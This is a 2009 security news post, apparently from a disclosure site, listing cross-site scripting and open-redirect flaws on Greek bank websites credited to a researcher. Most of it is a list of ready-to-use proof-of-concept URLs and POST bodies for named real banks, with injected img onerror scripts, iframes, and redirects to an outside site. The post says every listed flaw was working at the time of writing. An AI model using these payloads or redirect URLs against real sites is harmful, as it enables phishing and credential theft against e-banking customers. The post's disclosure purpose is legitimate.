Major Greek bank sites with SSL vulnerable to XSS and open redirects
Written by DP, Sunday, 10 May 2009
Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.
Fraudsters can exploit these cross-site scripting flaws to conduct convincing phishing attacks against e-banking customers and site visitors. Most of the affected pages are served over SSL, so security cannot be guaranteed just by the presence of "https" at the start of a URL, or by checking that the browser address bar shows the correct domain name.
All the reported vulnerabilities are working at the time of writing, and we hope they will be fixed as soon as possible.
Greek Banks XSS Mirrors:
winbank.gr XSS Mirror (SSL)
URL: https://www.winbank.gr/utils/iban1/iban_GR.asp
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7
milleniumbank.gr XSS Mirror (no SSL)
URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&MENU=CALC
POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82
probank.gr XSS Mirror (SSL)
URL: https://www.probank.gr/search/index.php?qu=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ch1%3EXSSed%3C%2Fh1%3E
proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)
URL: https://www.proton.gr/search/index.php?sid=61f882a8fc8dd3e8e175a416b0fb0afa&qu=%22%3E%3Cimg%20src=k%20onerror=alert(/XSS/)%20/%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E
URL: https://www.protonbank.gr/search/index.php?sid=5aa6fd152554b75ef8d5da27c103eff9&qu=%22%3E%3Cimg+src%3Dk+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.xssed.com%22%3E
eurobank.gr XSS Mirror (SSL)
URL: https://www.eurobank.gr/europortal/content/europortal/gr/content/privateservices/ibancalc.asp
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was+here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibanspace=&source=
nbg.gr Open redirect Mirror (SSL)
URL: https://e-loans.nbg.gr/webaccess/nbg/hanbg/loading.asp?pn=http://www.xssed.com
alpha.gr XSS Mirror (SSL)
URL: https://www.alpha.gr/tools/account.asp?Error=1&Browser=nc&AccountNumber="><img+src="" onError="document.location='http://xssed.com'">
bankofcyprus.gr Open redirect Mirror (no SSL)
URL: http://www.bankofcyprus.gr/adredir2.asp?url=http://www.xssed.com
ttbank.gr XSS Mirror
URL: http://www.ttbank.gr/default.asp?langID=1&pageID=122&siteID=1&SearchWord=%22%3E%3Cmarquee%3E%3Cimg+src=%22%22+onerror=%22write(%27%3Cb%3EHOHO%20XSSed%3C/b%3E%27);close();%22+/%3E&x=10&y=7
dias.com.gr XSS Mirror (no SSL)
URL: http://www.dias.com.gr/dias/content/main.asp?menu=2&search=%22%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E